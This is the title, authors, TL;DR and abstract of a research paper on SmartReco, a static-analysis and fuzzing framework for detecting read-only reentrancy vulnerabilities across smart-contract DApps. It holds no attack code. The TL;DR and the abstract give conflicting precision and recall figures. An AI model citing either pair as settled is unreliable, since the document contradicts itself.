SmartReco: Detecting Read-Only Reentrancy via Fine-Grained Cross-DApp Analysis
Jingwen Zhang, Zibin Zheng, Yuhong Nan, Mingxi Ye, Kaiwen Ning, Yu Zhang, Weizhe Zhang
TL;DR
This work tackles Read-Only Reentrancy (ROR), a cross-DApp vulnerability causing substantial losses, by introducing SmartReco, a framework that combines cross-DApp boundary identification, fine-grained static analysis to locate entry points, and multi-function fuzzing across DApps to verify ROR. It leverages on-chain transaction replay to collect DApp-based contextual data, prioritizes cross-DApp manipulable functions, and uses targeted fuzzing to uncover valid attack paths. Evaluation on a manual ROR dataset (precision 88.64%, recall 86.67%) and large-scale real-world DApps shows SmartReco detects 43 previously unreported RORs affecting around $520{,}000$, outperforming existing tools. The work provides open-source tooling and datasets, underscoring the practical impact of cross-DApp analysis for strengthening smart-contract security in the wild.
Abstract
Despite the increasing popularity of Decentralized Applications (DApps), they are suffering from various vulnerabilities that can be exploited by adversaries for profits. Among such vulnerabilities, Read-Only Reentrancy (called ROR in this paper), is an emerging type of vulnerability that arises from the complex interactions between DApps. In the recent three years, attack incidents of ROR have already caused around 30M USD losses to the DApp ecosystem. Existing techniques for vulnerability detection in smart contracts can hardly detect Read-Only Reentrancy attacks, due to the lack of tracking and analyzing the complex interactions between multiple DApps. In this paper, we propose SmartReco, a new framework for detecting Read-Only Reentrancy vulnerability in DApps through a novel combination of static and dynamic analysis (i.e., fuzzing) over smart contracts. The key design behind SmartReco is threefold: (1) SmartReco identifies the boundary between different DApps from the heavy-coupled cross-contract interactions. (2) SmartReco performs fine-grained static analysis to locate points of interest (i.e., entry functions) that may lead to ROR. (3) SmartReco utilizes the on-chain transaction data and performs multi-function fuzzing (i.e., the entry function and victim function) across different DApps to verify the existence of ROR. Our evaluation of a manual-labeled dataset with 45 RORs shows that SmartReco achieves a precision of 88.63% and a recall of 86.36%. In addition, SmartReco successfully detects 43 new RORs from 123 popular DApps. The total assets affected by such RORs reach around 520,000 USD.